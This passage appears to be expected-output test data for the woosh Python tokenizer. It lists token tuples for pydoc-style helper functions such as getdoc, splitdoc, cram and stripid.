woosh.Token(woosh.NEWLINE, '\r\n', 182, 19, 183, 0),
woosh.Token(woosh.DEDENT, ' ', 183, 0, 183, 4),
woosh.Token(woosh.NAME, 'return', 183, 4, 183, 10),
woosh.Token(woosh.NAME, 'inspect', 183, 11, 183, 18),
woosh.Token(woosh.OP, '.', 183, 18, 183, 19),
woosh.Token(woosh.NAME, 'cleandoc', 183, 19, 183, 27),
woosh.Token(woosh.OP, '(', 183, 27, 183, 28),
woosh.Token(woosh.NAME, 'doc', 183, 28, 183, 31),
woosh.Token(woosh.OP, ')', 183, 31, 183, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 183, 32, 184, 0),
woosh.Token(woosh.DEDENT, '', 185, 0, 185, 0),
woosh.Token(woosh.NAME, 'def', 185, 0, 185, 3),
woosh.Token(woosh.NAME, 'getdoc', 185, 4, 185, 10),
woosh.Token(woosh.OP, '(', 185, 10, 185, 11),
woosh.Token(woosh.NAME, 'object', 185, 11, 185, 17),
woosh.Token(woosh.OP, ')', 185, 17, 185, 18),
woosh.Token(woosh.OP, ':', 185, 18, 185, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 185, 19, 186, 0),
woosh.Token(woosh.INDENT, ' ', 186, 0, 186, 4),
woosh.Token(woosh.STRING, '"""Get the doc string or comments for an object."""', 186, 4, 186, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 186, 55, 187, 0),
woosh.Token(woosh.NAME, 'result', 187, 4, 187, 10),
woosh.Token(woosh.OP, '=', 187, 11, 187, 12),
woosh.Token(woosh.NAME, '_getdoc', 187, 13, 187, 20),
woosh.Token(woosh.OP, '(', 187, 20, 187, 21),
woosh.Token(woosh.NAME, 'object', 187, 21, 187, 27),
woosh.Token(woosh.OP, ')', 187, 27, 187, 28),
woosh.Token(woosh.NAME, 'or', 187, 29, 187, 31),
woosh.Token(woosh.NAME, 'inspect', 187, 32, 187, 39),
woosh.Token(woosh.OP, '.', 187, 39, 187, 40),
woosh.Token(woosh.NAME, 'getcomments', 187, 40, 187, 51),
woosh.Token(woosh.OP, '(', 187, 51, 187, 52),
woosh.Token(woosh.NAME, 'object', 187, 52, 187, 58),
woosh.Token(woosh.OP, ')', 187, 58, 187, 59),
woosh.Token(woosh.NEWLINE, '\r\n', 187, 59, 188, 0),
woosh.Token(woosh.NAME, 'return', 188, 4, 188, 10),
woosh.Token(woosh.NAME, 'result', 188, 11, 188, 17),
woosh.Token(woosh.NAME, 'and', 188, 18, 188, 21),
woosh.Token(woosh.NAME, 're', 188, 22, 188, 24),
woosh.Token(woosh.OP, '.', 188, 24, 188, 25),
woosh.Token(woosh.NAME, 'sub', 188, 25, 188, 28),
woosh.Token(woosh.OP, '(', 188, 28, 188, 29),
woosh.Token(woosh.STRING, "'^ *\\n'", 188, 29, 188, 36),
woosh.Token(woosh.OP, ',', 188, 36, 188, 37),
woosh.Token(woosh.STRING, "''", 188, 38, 188, 40),
woosh.Token(woosh.OP, ',', 188, 40, 188, 41),
woosh.Token(woosh.NAME, 'result', 188, 42, 188, 48),
woosh.Token(woosh.OP, '.', 188, 48, 188, 49),
woosh.Token(woosh.NAME, 'rstrip', 188, 49, 188, 55),
woosh.Token(woosh.OP, '(', 188, 55, 188, 56),
woosh.Token(woosh.OP, ')', 188, 56, 188, 57),
woosh.Token(woosh.OP, ')', 188, 57, 188, 58),
woosh.Token(woosh.NAME, 'or', 188, 59, 188, 61),
woosh.Token(woosh.STRING, "''", 188, 62, 188, 64),
woosh.Token(woosh.NEWLINE, '\r\n', 188, 64, 189, 0),
woosh.Token(woosh.DEDENT, '', 190, 0, 190, 0),
woosh.Token(woosh.NAME, 'def', 190, 0, 190, 3),
woosh.Token(woosh.NAME, 'splitdoc', 190, 4, 190, 12),
woosh.Token(woosh.OP, '(', 190, 12, 190, 13),
woosh.Token(woosh.NAME, 'doc', 190, 13, 190, 16),
woosh.Token(woosh.OP, ')', 190, 16, 190, 17),
woosh.Token(woosh.OP, ':', 190, 17, 190, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 190, 18, 191, 0),
woosh.Token(woosh.INDENT, ' ', 191, 0, 191, 4),
woosh.Token(woosh.STRING, '"""Split a doc string into a synopsis line (if any) and the rest."""', 191, 4, 191, 72),
woosh.Token(woosh.NEWLINE, '\r\n', 191, 72, 192, 0),
woosh.Token(woosh.NAME, 'lines', 192, 4, 192, 9),
woosh.Token(woosh.OP, '=', 192, 10, 192, 11),
woosh.Token(woosh.NAME, 'doc', 192, 12, 192, 15),
woosh.Token(woosh.OP, '.', 192, 15, 192, 16),
woosh.Token(woosh.NAME, 'strip', 192, 16, 192, 21),
woosh.Token(woosh.OP, '(', 192, 21, 192, 22),
woosh.Token(woosh.OP, ')', 192, 22, 192, 23),
woosh.Token(woosh.OP, '.', 192, 23, 192, 24),
woosh.Token(woosh.NAME, 'split', 192, 24, 192, 29),
woosh.Token(woosh.OP, '(', 192, 29, 192, 30),
woosh.Token(woosh.STRING, "'\\n'", 192, 30, 192, 34),
woosh.Token(woosh.OP, ')', 192, 34, 192, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 192, 35, 193, 0),
woosh.Token(woosh.NAME, 'if', 193, 4, 193, 6),
woosh.Token(woosh.NAME, 'len', 193, 7, 193, 10),
woosh.Token(woosh.OP, '(', 193, 10, 193, 11),
woosh.Token(woosh.NAME, 'lines', 193, 11, 193, 16),
woosh.Token(woosh.OP, ')', 193, 16, 193, 17),
woosh.Token(woosh.OP, '==', 193, 18, 193, 20),
woosh.Token(woosh.NUMBER, '1', 193, 21, 193, 22),
woosh.Token(woosh.OP, ':', 193, 22, 193, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 193, 23, 194, 0),
woosh.Token(woosh.INDENT, ' ', 194, 0, 194, 8),
woosh.Token(woosh.NAME, 'return', 194, 8, 194, 14),
woosh.Token(woosh.NAME, 'lines', 194, 15, 194, 20),
woosh.Token(woosh.OP, '[', 194, 20, 194, 21),
woosh.Token(woosh.NUMBER, '0', 194, 21, 194, 22),
woosh.Token(woosh.OP, ']', 194, 22, 194, 23),
woosh.Token(woosh.OP, ',', 194, 23, 194, 24),
woosh.Token(woosh.STRING, "''", 194, 25, 194, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 194, 27, 195, 0),
woosh.Token(woosh.DEDENT, ' ', 195, 0, 195, 4),
woosh.Token(woosh.NAME, 'elif', 195, 4, 195, 8),
woosh.Token(woosh.NAME, 'len', 195, 9, 195, 12),
woosh.Token(woosh.OP, '(', 195, 12, 195, 13),
woosh.Token(woosh.NAME, 'lines', 195, 13, 195, 18),
woosh.Token(woosh.OP, ')', 195, 18, 195, 19),
woosh.Token(woosh.OP, '>=', 195, 20, 195, 22),
woosh.Token(woosh.NUMBER, '2', 195, 23, 195, 24),
woosh.Token(woosh.NAME, 'and', 195, 25, 195, 28),
woosh.Token(woosh.NAME, 'not', 195, 29, 195, 32),
woosh.Token(woosh.NAME, 'lines', 195, 33, 195, 38),
woosh.Token(woosh.OP, '[', 195, 38, 195, 39),
woosh.Token(woosh.NUMBER, '1', 195, 39, 195, 40),
woosh.Token(woosh.OP, ']', 195, 40, 195, 41),
woosh.Token(woosh.OP, '.', 195, 41, 195, 42),
woosh.Token(woosh.NAME, 'rstrip', 195, 42, 195, 48),
woosh.Token(woosh.OP, '(', 195, 48, 195, 49),
woosh.Token(woosh.OP, ')', 195, 49, 195, 50),
woosh.Token(woosh.OP, ':', 195, 50, 195, 51),
woosh.Token(woosh.NEWLINE, '\r\n', 195, 51, 196, 0),
woosh.Token(woosh.INDENT, ' ', 196, 0, 196, 8),
woosh.Token(woosh.NAME, 'return', 196, 8, 196, 14),
woosh.Token(woosh.NAME, 'lines', 196, 15, 196, 20),
woosh.Token(woosh.OP, '[', 196, 20, 196, 21),
woosh.Token(woosh.NUMBER, '0', 196, 21, 196, 22),
woosh.Token(woosh.OP, ']', 196, 22, 196, 23),
woosh.Token(woosh.OP, ',', 196, 23, 196, 24),
woosh.Token(woosh.STRING, "'\\n'", 196, 25, 196, 29),
woosh.Token(woosh.OP, '.', 196, 29, 196, 30),
woosh.Token(woosh.NAME, 'join', 196, 30, 196, 34),
woosh.Token(woosh.OP, '(', 196, 34, 196, 35),
woosh.Token(woosh.NAME, 'lines', 196, 35, 196, 40),
woosh.Token(woosh.OP, '[', 196, 40, 196, 41),
woosh.Token(woosh.NUMBER, '2', 196, 41, 196, 42),
woosh.Token(woosh.OP, ':', 196, 42, 196, 43),
woosh.Token(woosh.OP, ']', 196, 43, 196, 44),
woosh.Token(woosh.OP, ')', 196, 44, 196, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 196, 45, 197, 0),
woosh.Token(woosh.DEDENT, ' ', 197, 0, 197, 4),
woosh.Token(woosh.NAME, 'return', 197, 4, 197, 10),
woosh.Token(woosh.STRING, "''", 197, 11, 197, 13),
woosh.Token(woosh.OP, ',', 197, 13, 197, 14),
woosh.Token(woosh.STRING, "'\\n'", 197, 15, 197, 19),
woosh.Token(woosh.OP, '.', 197, 19, 197, 20),
woosh.Token(woosh.NAME, 'join', 197, 20, 197, 24),
woosh.Token(woosh.OP, '(', 197, 24, 197, 25),
woosh.Token(woosh.NAME, 'lines', 197, 25, 197, 30),
woosh.Token(woosh.OP, ')', 197, 30, 197, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 197, 31, 198, 0),
woosh.Token(woosh.DEDENT, '', 199, 0, 199, 0),
woosh.Token(woosh.NAME, 'def', 199, 0, 199, 3),
woosh.Token(woosh.NAME, 'classname', 199, 4, 199, 13),
woosh.Token(woosh.OP, '(', 199, 13, 199, 14),
woosh.Token(woosh.NAME, 'object', 199, 14, 199, 20),
woosh.Token(woosh.OP, ',', 199, 20, 199, 21),
woosh.Token(woosh.NAME, 'modname', 199, 22, 199, 29),
woosh.Token(woosh.OP, ')', 199, 29, 199, 30),
woosh.Token(woosh.OP, ':', 199, 30, 199, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 199, 31, 200, 0),
woosh.Token(woosh.INDENT, ' ', 200, 0, 200, 4),
woosh.Token(woosh.STRING, '"""Get a class name and qualify it with a module name if necessary."""', 200, 4, 200, 74),
woosh.Token(woosh.NEWLINE, '\r\n', 200, 74, 201, 0),
woosh.Token(woosh.NAME, 'name', 201, 4, 201, 8),
woosh.Token(woosh.OP, '=', 201, 9, 201, 10),
woosh.Token(woosh.NAME, 'object', 201, 11, 201, 17),
woosh.Token(woosh.OP, '.', 201, 17, 201, 18),
woosh.Token(woosh.NAME, '__name__', 201, 18, 201, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 201, 26, 202, 0),
woosh.Token(woosh.NAME, 'if', 202, 4, 202, 6),
woosh.Token(woosh.NAME, 'object', 202, 7, 202, 13),
woosh.Token(woosh.OP, '.', 202, 13, 202, 14),
woosh.Token(woosh.NAME, '__module__', 202, 14, 202, 24),
woosh.Token(woosh.OP, '!=', 202, 25, 202, 27),
woosh.Token(woosh.NAME, 'modname', 202, 28, 202, 35),
woosh.Token(woosh.OP, ':', 202, 35, 202, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 202, 36, 203, 0),
woosh.Token(woosh.INDENT, ' ', 203, 0, 203, 8),
woosh.Token(woosh.NAME, 'name', 203, 8, 203, 12),
woosh.Token(woosh.OP, '=', 203, 13, 203, 14),
woosh.Token(woosh.NAME, 'object', 203, 15, 203, 21),
woosh.Token(woosh.OP, '.', 203, 21, 203, 22),
woosh.Token(woosh.NAME, '__module__', 203, 22, 203, 32),
woosh.Token(woosh.OP, '+', 203, 33, 203, 34),
woosh.Token(woosh.STRING, "'.'", 203, 35, 203, 38),
woosh.Token(woosh.OP, '+', 203, 39, 203, 40),
woosh.Token(woosh.NAME, 'name', 203, 41, 203, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 203, 45, 204, 0),
woosh.Token(woosh.DEDENT, ' ', 204, 0, 204, 4),
woosh.Token(woosh.NAME, 'return', 204, 4, 204, 10),
woosh.Token(woosh.NAME, 'name', 204, 11, 204, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 204, 15, 205, 0),
woosh.Token(woosh.DEDENT, '', 206, 0, 206, 0),
woosh.Token(woosh.NAME, 'def', 206, 0, 206, 3),
woosh.Token(woosh.NAME, 'isdata', 206, 4, 206, 10),
woosh.Token(woosh.OP, '(', 206, 10, 206, 11),
woosh.Token(woosh.NAME, 'object', 206, 11, 206, 17),
woosh.Token(woosh.OP, ')', 206, 17, 206, 18),
woosh.Token(woosh.OP, ':', 206, 18, 206, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 206, 19, 207, 0),
woosh.Token(woosh.INDENT, ' ', 207, 0, 207, 4),
woosh.Token(woosh.STRING, '"""Check if an object is of a type that probably means it\'s data."""', 207, 4, 207, 72),
woosh.Token(woosh.NEWLINE, '\r\n', 207, 72, 208, 0),
woosh.Token(woosh.NAME, 'return', 208, 4, 208, 10),
woosh.Token(woosh.NAME, 'not', 208, 11, 208, 14),
woosh.Token(woosh.OP, '(', 208, 15, 208, 16),
woosh.Token(woosh.NAME, 'inspect', 208, 16, 208, 23),
woosh.Token(woosh.OP, '.', 208, 23, 208, 24),
woosh.Token(woosh.NAME, 'ismodule', 208, 24, 208, 32),
woosh.Token(woosh.OP, '(', 208, 32, 208, 33),
woosh.Token(woosh.NAME, 'object', 208, 33, 208, 39),
woosh.Token(woosh.OP, ')', 208, 39, 208, 40),
woosh.Token(woosh.NAME, 'or', 208, 41, 208, 43),
woosh.Token(woosh.NAME, 'inspect', 208, 44, 208, 51),
woosh.Token(woosh.OP, '.', 208, 51, 208, 52),
woosh.Token(woosh.NAME, 'isclass', 208, 52, 208, 59),
woosh.Token(woosh.OP, '(', 208, 59, 208, 60),
woosh.Token(woosh.NAME, 'object', 208, 60, 208, 66),
woosh.Token(woosh.OP, ')', 208, 66, 208, 67),
woosh.Token(woosh.NAME, 'or', 208, 68, 208, 70),
woosh.Token(woosh.NAME, 'inspect', 209, 16, 209, 23),
woosh.Token(woosh.OP, '.', 209, 23, 209, 24),
woosh.Token(woosh.NAME, 'isroutine', 209, 24, 209, 33),
woosh.Token(woosh.OP, '(', 209, 33, 209, 34),
woosh.Token(woosh.NAME, 'object', 209, 34, 209, 40),
woosh.Token(woosh.OP, ')', 209, 40, 209, 41),
woosh.Token(woosh.NAME, 'or', 209, 42, 209, 44),
woosh.Token(woosh.NAME, 'inspect', 209, 45, 209, 52),
woosh.Token(woosh.OP, '.', 209, 52, 209, 53),
woosh.Token(woosh.NAME, 'isframe', 209, 53, 209, 60),
woosh.Token(woosh.OP, '(', 209, 60, 209, 61),
woosh.Token(woosh.NAME, 'object', 209, 61, 209, 67),
woosh.Token(woosh.OP, ')', 209, 67, 209, 68),
woosh.Token(woosh.NAME, 'or', 209, 69, 209, 71),
woosh.Token(woosh.NAME, 'inspect', 210, 16, 210, 23),
woosh.Token(woosh.OP, '.', 210, 23, 210, 24),
woosh.Token(woosh.NAME, 'istraceback', 210, 24, 210, 35),
woosh.Token(woosh.OP, '(', 210, 35, 210, 36),
woosh.Token(woosh.NAME, 'object', 210, 36, 210, 42),
woosh.Token(woosh.OP, ')', 210, 42, 210, 43),
woosh.Token(woosh.NAME, 'or', 210, 44, 210, 46),
woosh.Token(woosh.NAME, 'inspect', 210, 47, 210, 54),
woosh.Token(woosh.OP, '.', 210, 54, 210, 55),
woosh.Token(woosh.NAME, 'iscode', 210, 55, 210, 61),
woosh.Token(woosh.OP, '(', 210, 61, 210, 62),
woosh.Token(woosh.NAME, 'object', 210, 62, 210, 68),
woosh.Token(woosh.OP, ')', 210, 68, 210, 69),
woosh.Token(woosh.OP, ')', 210, 69, 210, 70),
woosh.Token(woosh.NEWLINE, '\r\n', 210, 70, 211, 0),
woosh.Token(woosh.DEDENT, '', 212, 0, 212, 0),
woosh.Token(woosh.NAME, 'def', 212, 0, 212, 3),
woosh.Token(woosh.NAME, 'replace', 212, 4, 212, 11),
woosh.Token(woosh.OP, '(', 212, 11, 212, 12),
woosh.Token(woosh.NAME, 'text', 212, 12, 212, 16),
woosh.Token(woosh.OP, ',', 212, 16, 212, 17),
woosh.Token(woosh.OP, '*', 212, 18, 212, 19),
woosh.Token(woosh.NAME, 'pairs', 212, 19, 212, 24),
woosh.Token(woosh.OP, ')', 212, 24, 212, 25),
woosh.Token(woosh.OP, ':', 212, 25, 212, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 212, 26, 213, 0),
woosh.Token(woosh.INDENT, ' ', 213, 0, 213, 4),
woosh.Token(woosh.STRING, '"""Do a series of global replacements on a string."""', 213, 4, 213, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 213, 57, 214, 0),
woosh.Token(woosh.NAME, 'while', 214, 4, 214, 9),
woosh.Token(woosh.NAME, 'pairs', 214, 10, 214, 15),
woosh.Token(woosh.OP, ':', 214, 15, 214, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 214, 16, 215, 0),
woosh.Token(woosh.INDENT, ' ', 215, 0, 215, 8),
woosh.Token(woosh.NAME, 'text', 215, 8, 215, 12),
woosh.Token(woosh.OP, '=', 215, 13, 215, 14),
woosh.Token(woosh.NAME, 'pairs', 215, 15, 215, 20),
woosh.Token(woosh.OP, '[', 215, 20, 215, 21),
woosh.Token(woosh.NUMBER, '1', 215, 21, 215, 22),
woosh.Token(woosh.OP, ']', 215, 22, 215, 23),
woosh.Token(woosh.OP, '.', 215, 23, 215, 24),
woosh.Token(woosh.NAME, 'join', 215, 24, 215, 28),
woosh.Token(woosh.OP, '(', 215, 28, 215, 29),
woosh.Token(woosh.NAME, 'text', 215, 29, 215, 33),
woosh.Token(woosh.OP, '.', 215, 33, 215, 34),
woosh.Token(woosh.NAME, 'split', 215, 34, 215, 39),
woosh.Token(woosh.OP, '(', 215, 39, 215, 40),
woosh.Token(woosh.NAME, 'pairs', 215, 40, 215, 45),
woosh.Token(woosh.OP, '[', 215, 45, 215, 46),
woosh.Token(woosh.NUMBER, '0', 215, 46, 215, 47),
woosh.Token(woosh.OP, ']', 215, 47, 215, 48),
woosh.Token(woosh.OP, ')', 215, 48, 215, 49),
woosh.Token(woosh.OP, ')', 215, 49, 215, 50),
woosh.Token(woosh.NEWLINE, '\r\n', 215, 50, 216, 0),
woosh.Token(woosh.NAME, 'pairs', 216, 8, 216, 13),
woosh.Token(woosh.OP, '=', 216, 14, 216, 15),
woosh.Token(woosh.NAME, 'pairs', 216, 16, 216, 21),
woosh.Token(woosh.OP, '[', 216, 21, 216, 22),
woosh.Token(woosh.NUMBER, '2', 216, 22, 216, 23),
woosh.Token(woosh.OP, ':', 216, 23, 216, 24),
woosh.Token(woosh.OP, ']', 216, 24, 216, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 216, 25, 217, 0),
woosh.Token(woosh.DEDENT, ' ', 217, 0, 217, 4),
woosh.Token(woosh.NAME, 'return', 217, 4, 217, 10),
woosh.Token(woosh.NAME, 'text', 217, 11, 217, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 217, 15, 218, 0),
woosh.Token(woosh.DEDENT, '', 219, 0, 219, 0),
woosh.Token(woosh.NAME, 'def', 219, 0, 219, 3),
woosh.Token(woosh.NAME, 'cram', 219, 4, 219, 8),
woosh.Token(woosh.OP, '(', 219, 8, 219, 9),
woosh.Token(woosh.NAME, 'text', 219, 9, 219, 13),
woosh.Token(woosh.OP, ',', 219, 13, 219, 14),
woosh.Token(woosh.NAME, 'maxlen', 219, 15, 219, 21),
woosh.Token(woosh.OP, ')', 219, 21, 219, 22),
woosh.Token(woosh.OP, ':', 219, 22, 219, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 219, 23, 220, 0),
woosh.Token(woosh.INDENT, ' ', 220, 0, 220, 4),
woosh.Token(woosh.STRING, '"""Omit part of a string if needed to make it fit in a maximum length."""', 220, 4, 220, 77),
woosh.Token(woosh.NEWLINE, '\r\n', 220, 77, 221, 0),
woosh.Token(woosh.NAME, 'if', 221, 4, 221, 6),
woosh.Token(woosh.NAME, 'len', 221, 7, 221, 10),
woosh.Token(woosh.OP, '(', 221, 10, 221, 11),
woosh.Token(woosh.NAME, 'text', 221, 11, 221, 15),
woosh.Token(woosh.OP, ')', 221, 15, 221, 16),
woosh.Token(woosh.OP, '>', 221, 17, 221, 18),
woosh.Token(woosh.NAME, 'maxlen', 221, 19, 221, 25),
woosh.Token(woosh.OP, ':', 221, 25, 221, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 221, 26, 222, 0),
woosh.Token(woosh.INDENT, ' ', 222, 0, 222, 8),
woosh.Token(woosh.NAME, 'pre', 222, 8, 222, 11),
woosh.Token(woosh.OP, '=', 222, 12, 222, 13),
woosh.Token(woosh.NAME, 'max', 222, 14, 222, 17),
woosh.Token(woosh.OP, '(', 222, 17, 222, 18),
woosh.Token(woosh.NUMBER, '0', 222, 18, 222, 19),
woosh.Token(woosh.OP, ',', 222, 19, 222, 20),
woosh.Token(woosh.OP, '(', 222, 21, 222, 22),
woosh.Token(woosh.NAME, 'maxlen', 222, 22, 222, 28),
woosh.Token(woosh.OP, '-', 222, 28, 222, 29),
woosh.Token(woosh.NUMBER, '3', 222, 29, 222, 30),
woosh.Token(woosh.OP, ')', 222, 30, 222, 31),
woosh.Token(woosh.OP, '//', 222, 31, 222, 33),
woosh.Token(woosh.NUMBER, '2', 222, 33, 222, 34),
woosh.Token(woosh.OP, ')', 222, 34, 222, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 222, 35, 223, 0),
woosh.Token(woosh.NAME, 'post', 223, 8, 223, 12),
woosh.Token(woosh.OP, '=', 223, 13, 223, 14),
woosh.Token(woosh.NAME, 'max', 223, 15, 223, 18),
woosh.Token(woosh.OP, '(', 223, 18, 223, 19),
woosh.Token(woosh.NUMBER, '0', 223, 19, 223, 20),
woosh.Token(woosh.OP, ',', 223, 20, 223, 21),
woosh.Token(woosh.NAME, 'maxlen', 223, 22, 223, 28),
woosh.Token(woosh.OP, '-', 223, 28, 223, 29),
woosh.Token(woosh.NUMBER, '3', 223, 29, 223, 30),
woosh.Token(woosh.OP, '-', 223, 30, 223, 31),
woosh.Token(woosh.NAME, 'pre', 223, 31, 223, 34),
woosh.Token(woosh.OP, ')', 223, 34, 223, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 223, 35, 224, 0),
woosh.Token(woosh.NAME, 'return', 224, 8, 224, 14),
woosh.Token(woosh.NAME, 'text', 224, 15, 224, 19),
woosh.Token(woosh.OP, '[', 224, 19, 224, 20),
woosh.Token(woosh.OP, ':', 224, 20, 224, 21),
woosh.Token(woosh.NAME, 'pre', 224, 21, 224, 24),
woosh.Token(woosh.OP, ']', 224, 24, 224, 25),
woosh.Token(woosh.OP, '+', 224, 26, 224, 27),
woosh.Token(woosh.STRING, "'...'", 224, 28, 224, 33),
woosh.Token(woosh.OP, '+', 224, 34, 224, 35),
woosh.Token(woosh.NAME, 'text', 224, 36, 224, 40),
woosh.Token(woosh.OP, '[', 224, 40, 224, 41),
woosh.Token(woosh.NAME, 'len', 224, 41, 224, 44),
woosh.Token(woosh.OP, '(', 224, 44, 224, 45),
woosh.Token(woosh.NAME, 'text', 224, 45, 224, 49),
woosh.Token(woosh.OP, ')', 224, 49, 224, 50),
woosh.Token(woosh.OP, '-', 224, 50, 224, 51),
woosh.Token(woosh.NAME, 'post', 224, 51, 224, 55),
woosh.Token(woosh.OP, ':', 224, 55, 224, 56),
woosh.Token(woosh.OP, ']', 224, 56, 224, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 224, 57, 225, 0),
woosh.Token(woosh.DEDENT, ' ', 225, 0, 225, 4),
woosh.Token(woosh.NAME, 'return', 225, 4, 225, 10),
woosh.Token(woosh.NAME, 'text', 225, 11, 225, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 225, 15, 226, 0),
woosh.Token(woosh.DEDENT, '', 227, 0, 227, 0),
woosh.Token(woosh.NAME, '_re_stripid', 227, 0, 227, 11),
woosh.Token(woosh.OP, '=', 227, 12, 227, 13),
woosh.Token(woosh.NAME, 're', 227, 14, 227, 16),
woosh.Token(woosh.OP, '.', 227, 16, 227, 17),
woosh.Token(woosh.NAME, 'compile', 227, 17, 227, 24),
woosh.Token(woosh.OP, '(', 227, 24, 227, 25),
woosh.Token(woosh.STRING, "r' at 0x[0-9a-f]{6,16}(>+)$'", 227, 25, 227, 53),
woosh.Token(woosh.OP, ',', 227, 53, 227, 54),
woosh.Token(woosh.NAME, 're', 227, 55, 227, 57),
woosh.Token(woosh.OP, '.', 227, 57, 227, 58),
woosh.Token(woosh.NAME, 'IGNORECASE', 227, 58, 227, 68),
woosh.Token(woosh.OP, ')', 227, 68, 227, 69),
woosh.Token(woosh.NEWLINE, '\r\n', 227, 69, 228, 0),
woosh.Token(woosh.NAME, 'def', 228, 0, 228, 3),
woosh.Token(woosh.NAME, 'stripid', 228, 4, 228, 11),
woosh.Token(woosh.OP, '(', 228, 11, 228, 12),
woosh.Token(woosh.NAME, 'text', 228, 12, 228, 16),
woosh.Token(woosh.OP, ')', 228, 16, 228, 17),
woosh.Token(woosh.OP, ':', 228, 17, 228, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 228, 18, 229, 0),
woosh.Token(woosh.INDENT, ' ', 229, 0, 229, 4),
woosh.Token(woosh.STRING, '"""Remove the hexadecimal id from a Python object representation."""', 229, 4, 229, 72),
woosh.Token(woosh.NEWLINE, '\r\n', 229, 72, 230, 0),
woosh.Token(woosh.COMMENT, '# The behaviour of %p is implementation-dependent in terms of case.', 230, 4, 230, 71),
woosh.Token(woosh.NAME, 'return', 231, 4, 231, 10),
woosh.Token(woosh.NAME, '_re_stripid', 231, 11, 231, 22),
woosh.Token(woosh.OP, '.', 231, 22, 231, 23),
woosh.Token(woosh.NAME, 'sub', 231, 23, 231, 26),
woosh.Token(woosh.OP, '(', 231, 26, 231, 27),
woosh.Token(woosh.STRING, "r'\\1'", 231, 27, 231, 32),
woosh.Token(woosh.OP, ',', 231, 32, 231, 33),
woosh.Token(woosh.NAME, 'text', 231, 34, 231, 38),
woosh.Token(woosh.OP, ')', 231, 38, 231, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 231, 39, 232, 0),
woosh.Token(woosh.DEDENT, '', 233, 0, 233, 0),
woosh.Token(woosh.NAME, 'def', 233, 0, 233, 3),
woosh.Token(woosh.NAME, '_is_bound_method', 233, 4, 233, 20),
woosh.Token(woosh.OP, '(', 233, 20, 233, 21),
woosh.Token(woosh.NAME, 'fn', 233, 21, 233, 23),
woosh.Token(woosh.OP, ')', 233, 23, 233, 24),
woosh.Token(woosh.OP, ':', 233, 24, 233, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 233, 25, 234, 0),
woosh.Token(woosh.INDENT, ' ', 234, 0, 234, 4),
woosh.Token(woosh.STRING, '"""\r\n Returns True if fn is a bound method, regardless of whether\r\n fn was implemented in Python or in C.\r\n """', 234, 4, 237, 7),
woosh.Token(woosh.NEWLINE, '\r\n', 237, 7, 238, 0),
woosh.Token(woosh.NAME, 'if', 238, 4, 238, 6),
woosh.Token(woosh.NAME, 'inspect', 238, 7, 238, 14),
woosh.Token(woosh.OP, '.', 238, 14, 238, 15),
woosh.Token(woosh.NAME, 'ismethod', 238, 15, 238, 23),
woosh.Token(woosh.OP, '(', 238, 23, 238, 24),
woosh.Token(woosh.NAME, 'fn', 238, 24, 238, 26),
woosh.Token(woosh.OP, ')', 238, 26, 238, 27),
woosh.Token(woosh.OP, ':', 238, 27, 238, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 238, 28, 239, 0),
woosh.Token(woosh.INDENT, ' ', 239, 0, 239, 8),
woosh.Token(woosh.NAME, 'return', 239, 8, 239, 14),
woosh.Token(woosh.NAME, 'True', 239, 15, 239, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 239, 19, 240, 0),
woosh.Token(woosh.DEDENT, ' ', 240, 0, 240, 4),
woosh.Token(woosh.NAME, 'if', 240, 4, 240, 6),
woosh.Token(woosh.NAME, 'inspect', 240, 7, 240, 14),
woosh.Token(woosh.OP, '.', 240, 14, 240, 15),
woosh.Token(woosh.NAME, 'isbuiltin', 240, 15, 240, 24),
woosh.Token(woosh.OP, '(', 240, 24, 240, 25),
woosh.Token(woosh.NAME, 'fn', 240, 25, 240, 27),
woosh.Token(woosh.OP, ')', 240, 27, 240, 28),
woosh.Token(woosh.OP, ':', 240, 28, 240, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 240, 29, 241, 0),
woosh.Token(woosh.INDENT, ' ', 241, 0, 241, 8),
woosh.Token(woosh.NAME, 'self', 241, 8, 241, 12),
woosh.Token(woosh.OP, '=', 241, 13, 241, 14),
woosh.Token(woosh.NAME, 'getattr', 241, 15, 241, 22),
woosh.Token(woosh.OP, '(', 241, 22, 241, 23),
woosh.Token(woosh.NAME, 'fn', 241, 23, 241, 25),
woosh.Token(woosh.OP, ',', 241, 25, 241, 26),
woosh.Token(woosh.STRING, "'__self__'", 241, 27, 241, 37),
woosh.Token(woosh.OP, ',', 241, 37, 241, 38),
woosh.Token(woosh.NAME, 'None', 241, 39, 241, 43),
woosh.Token(woosh.OP, ')', 241, 43, 241, 44),
woosh.Token(woosh.NEWLINE, '\r\n', 241, 44, 242, 0),
woosh.Token(woosh.NAME, 'return', 242, 8, 242, 14),
woosh.Token(woosh.NAME, 'not', 242, 15, 242, 18),
woosh.Token(woosh.OP, '(', 242, 19, 242, 20),
woosh.Token(woosh.NAME, 'inspect', 242, 20, 242, 27),
woosh.Token(woosh.OP, '.', 242, 27, 242, 28),
woosh.Token(woosh.NAME, 'ismodule', 242, 28, 242, 36),
woosh.Token(woosh.OP, '(', 242, 36, 242, 37),
